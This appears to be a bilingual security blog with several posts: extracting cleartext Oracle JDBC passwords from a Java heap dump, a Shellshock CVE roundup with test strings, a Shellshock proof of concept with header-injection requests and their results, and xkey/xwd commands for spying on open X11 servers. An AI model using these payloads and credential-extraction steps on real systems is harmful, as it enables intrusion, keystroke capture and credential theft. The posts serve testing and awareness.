Recherche de mot de passe de BD dans la mémoire Java | Searching for Oracle database passwords in Java VM

Voici un petit truc pour rechercher des mots de passe (en texte clair) de BD Oracle en mémoire de processus Java. Les programmes utilisés proviennent du JDK standard d'Oracle.

Lister les programmes java en utilisant jps:

$ jps
32488 MainClassName
1945 Jps

La commande jps permet d'avoir la liste des processus java "instrumentés". L'autre approche (plus inclusive) serait d'utiliser quelque chose comme pgrep java.

Lorsqu'on a le PID, on peut utiliser jmap pour générer une image de la mémoire:

$ jmap -heap:format=b 32488

Attaching to process ID 32488, please wait...
Debugger attached successfully.
Server compiler detected.
JVM version is 25.66-b17
Dumping heap to heap.bin ...
Heap dump file created

Une fois l'image créée, on peut l'analyser en utilisant jhat. Cette commande démarre un serveur web qui permet l'analyse.

[t903335@slave1 ~]$ jhat heap.bin
Reading from heap.bin...
Dump file created Tue Apr 19 23:11:01 UTC 2016
Snapshot read, resolving...
Resolving 386035 objects...
[...]

WARNING:  Failed to resolve object id 0x585dc0618 for field clazz (signature L)
Chasing references, expect 77 dots.............................................................................
Eliminating duplicate references.............................................................................
Snapshot resolved.
Started HTTP server on port 7000
Server is ready.

En connectant sur le port mentionné ci-haut avec un navigateur web (http://127.0.0.1:7000/), on obtient la liste de classes java trouvées en mémoire. Au bas de la page, il y a un lien intitulé Execute Object Query Language (OQL) query qui nous envoie à /oql. Cette page permet d'exécuter des recherches ciblées de la mémoire.

En faisant un peu de recherche, j'ai remarqué que pour trouver le mot de passe qui est envoyé à la BD, il suffit d'exécuter cette recherche OQL: 

OQL Query: heap.findClass("oracle.jdbc.driver.T4CConnection")

Si ce pilote JDBC est utilisé par le programme java, on obtiendra un lien vers cette classe. En cliquant sur ce lien, on a l'option de visionner ses instances en cliquant sur le lien Instances: Exclude subclasses. Dans la page suivante on verra quelque chose comme:

oracle.jdbc.driver.T4CConnection@0x5861d36a8 (1362 bytes)
Total of 1 instances occupying 1362 bytes.

En cliquant sur le lien vers l'instance, on aura une page suivante qui montrera les différentes valeurs des différents attributs de l'objet en question. Parmi un de ces attributs se trouve password, userName et database (URI). Bien sûr, toutes les valeurs sont les valeurs originales (dans le clair)!

Il me reste à rechercher comment on peut éviter cette exposition continue en mémoire du mot de passe à même le pilote JDBC de Oracle. J'espère que ce n'est qu'une erreur d'implantation (par le développeur-utilisateur du pilote).

Référence OQL: https://visualvm.java.net/oqlhelp.html
__________________________

Below is a trick for finding clear text password in Java VM memory when a java program utilizes (one of) the JDBC driver(s) from Oracle (ojdbc6.jar I think). The commands used come from the standard Oracle JDK..

To list java programs, use jps:

$ jps
32488 MainClassName
1945 Jps

The jps command lists the instrumented java processes. Another approach to get a more incluse list would be to use something like pgrep java.

Once we have the PID, we can use jmap to dump the java process memory to disk:

$ jmap -heap:format=b 32488

Attaching to process ID 32488, please wait...
Debugger attached successfully.
Server compiler detected.
JVM version is 25.66-b17
Dumping heap to heap.bin ...
Heap dump file created

Once we have the memory dump, we can analyze it using jhat. This command also starts a web server for the analyst.

$ jhat heap.bin
Reading from heap.bin...
Dump file created Tue Apr 19 23:11:01 UTC 2016
Snapshot read, resolving...
Resolving 386035 objects...
[...]

WARNING:  Failed to resolve object id 0x585dc0618 for field clazz (signature L)
Chasing references, expect 77 dots.............................................................................
Eliminating duplicate references.............................................................................
Snapshot resolved.
Started HTTP server on port 7000
Server is ready.

When connecting to that port with a web browser (http://127.0.0.1:7000/), we obain a list of java classes found in memory. At the bottom of the page, there's a link Execute Object Query Language (OQL) query that brings us to /oql. This page allows searching for structured memory content.

After a bit of tinkering, I figured out that to find the database password, all I needed to do is to run this OQL query: 

OQL Query: heap.findClass("oracle.jdbc.driver.T4CConnection")

If this JDBC driver is used in the java program, we obtain a link to this class. When clicking that link, we can view its instance(s) by clicking on Instances: Exclude subclasses. In the following page, we get something like:

oracle.jdbc.driver.T4CConnection@0x5861d36a8 (1362 bytes)
Total of 1 instances occupying 1362 bytes.

When clicking on the link for the instance, we get another page with different attributes and corresponding values within the object. As part of these, we find the attributes named password, userName and database (URI). Of course, all of those values are in the clear!

Now, I need to find a way to avoid this continuous exposure in memory when using Oracle drivers. There's hopefully a better way to use it or simply a better driver altogether...

More details on OQL: https://visualvm.java.net/oqlhelp.html

Current Intel on BashBug / Shellshock

CVEs
CVE-2014-6271  (1st bug report)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-7169   (2nd bug/variant, aka AfterShock)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169
GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.

CVE-2014-7186   (3rd bug/variant found by Redhat's Florian Weimer)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186
The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the "redir_stack" issue.

CVE-2014-7187    (4th bug/variant found by Redhat's Florian Weimer)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187
Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the "word_lineno" issue.

CVE-2014-6277   (5th bug/variant found by Google's Michael Zalewski)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-627
Variant 1. GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.

CVE-2014-6278   (6th bug/variant found by Google's Michael Zalewski)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278   (reserved, not available yet)
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
Variant 2. (see Variant 1 CVE-2014-6277 for a description)

From SANS Advisory Board: Only the first two listed above are patched in “main stream” linux distros. A source code patch is available for the rest if you want to compile bash yourself, but exploitation is a tad harder for the last 4.

Other Info
GNU Patch Info
List for current bash (4.3): http://ftp.gnu.org/gnu/bash/bash-4.3-patches/
Latest bash patch (027): http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027

Botnets

• wopbot: http://www.itnews.com.au/News/396197,first-shellshock-botnet-attacks-akamai-us-dod-networks.aspx
• bashlite: http://blog.trendmicro.com/trendlabs-security-intelligence/shellshock-updates-bashlite-ccs-seen-shellshock-exploit-attempts-in-brazil/

Network Detection (IDS, IPS, WAF)

• VRT and EmergingThreats posts showing this is being addressed for Snort
• ...

Exploits

• My testing showed it's easy to attack using the given test strings, simply by using them directly in HTTP headers such as Cookie and User-Agent.
• See also https://www.fishnetsecurity.com/6labs/blog/shellshock-vulnerability-bash-allows-unauthorized-remote-code-execution

Bash Test Strings
Command line tests to verify proper patching (and to somehow use in our detections):

• Early patch: env x='() { :;}; echo Not patched' bash -c "echo This is a test."
• Later patch: foo='() { echo Not patched; }' bash -c foo
• (search for more...)

Test pour Shellshock/BashBug | POC for ShellShock / BashBug CVE-2014-6271

Ref CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

I tried real quick in a VM and it's easy to inject via user-agent and cookie headers. I didn't get much result though via a GET parameter though (either via URL-encoding or by just encoding spaces) but I just wanted to prove the point for myself quickly...


Simple CGI Script on a vulnerable server

/usr/lib/cgi-bin$ cat echo.sh
#!/bin/bash
echo -e "Content-type: text/plain\n\n"
echo "hi ya! Is there a file in /tmp as a result of this?";
echo "Output from env:"
env


GET request from attacker

GET /cgi-bin/echo.sh HTTP/1.1
Host: localhost
Content-Length: 0
User-Agent: () { :;}; echo Hacked > /tmp/HackedViaUserAgent
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: () { :;}; echo Hacked > /tmp/HackedViaCookie
Connection: keep-alive



GET response received by attacker

HTTP/1.1 200 OK
Date: Thu, 25 Sep 2014 23:42:53 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Length: 1866
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

hi ya! Is there a file in /tmp as a result of this?
Output from env:
[...]
HTTP_USER_AGENT=() { :
}
HTTP_COOKIE=() { :
}
_=/usr/bin/env


Result on attacked server

$ ls /tmp/Hacked*
/tmp/HackedViaCookie /tmp/HackedViaUserAgent

Attaque de serveur X11 sans authentification (après xhost +)

Voici quelques commandes pour exploiter un serveur X11 ouvert:

Capture de clés à distance (remote key capture)
$ xkey IP:0.0

NB:

• Le code source pour xkey.c peut être trouvé ici
• Utiliser 0.0 pour le port 6000, 1.0 pour le port 6001...

 
Capture de l'écran (screen capture):
$ xwd -display IP:0.0 -root -silent -out /tmp/screendump
$ xv /tmp/screendump 
$ xwd -display IP:0.0 -root -silent | xwdtopnm | pnmtopng > Screenshot.png


Références:

• Hack computer: X11 (6000 TCP) 
• Hacking Linux Exposed

Vulnérabilité “0 day” de Microsoft exploitable via Metasploit!

La vulnérabilité des shortcuts Microsoft peut maintenant être exploitée via Metasploit!
Il est important, plus que jamais d’appliquer les règles de privilèges minimums pour les usagers  Windows ou bien d’appliquer les recommandations de Microsoft.

The Microsoft shortcut vulnerability can now be exploited by using Metasploit!
It is now important, more than ever, to apply the least privilege rules for Windows users or to follow the specific Microsoft workaround.

Click fraud

Un article du SC Magazine explique ce qu’est le Click Fraud et pourquoi les compagnies de publicités doivent être vigilentes.
C’est une attaque qui implique une(des) personne(s) ou programme(s) qui cliquent à répétition sur une annonce publicitaire en-ligne pour augmenter le compte des références payables par les clients des compagnies de publicité.
Cette attaque se prête très bien à une architecture de botnet dont le Bahama Botnet.

Increasingly, click fraud seems to be underpinned by botnets, according to a report from Click Forensics, an online advertising auditing service. In fact, botnets accounted for nearly 43 percent of all click fraud in the third quarter of this year, the study, released Thursday, found. This was a big jump in the use of botnets, marking a doubling in two years, and an increase of 27.5 percent over the same quarter last year.
One botnet, a highly sophisticated click-fraud network of zombie computers dubbed the “Bahama botnet,” was implicated in a recent scareware incident involving NYTimes.com display ads. The source of that attack was traced back to the Ukrainian Fan Club, a known group of online fraudsters, which redirected traffic through 200,000 parked domains located in the Bahamas.
Click fraud involves a person, or script, clicking on an ad repeatedly to drive up countable hits that are paid for by unknowing advertisers. “Botnets perpetrating click fraud and other online schemes continue to grow in number and sophistication,” Paul Pellman, CEO of Click Forensics, said in a statement. “Advertisers and ad providers need to be especially vigilant about such activity as we enter the competitive search marketing holiday season.”
via Botnet use in click fraud skyrockets – SC Magazine US.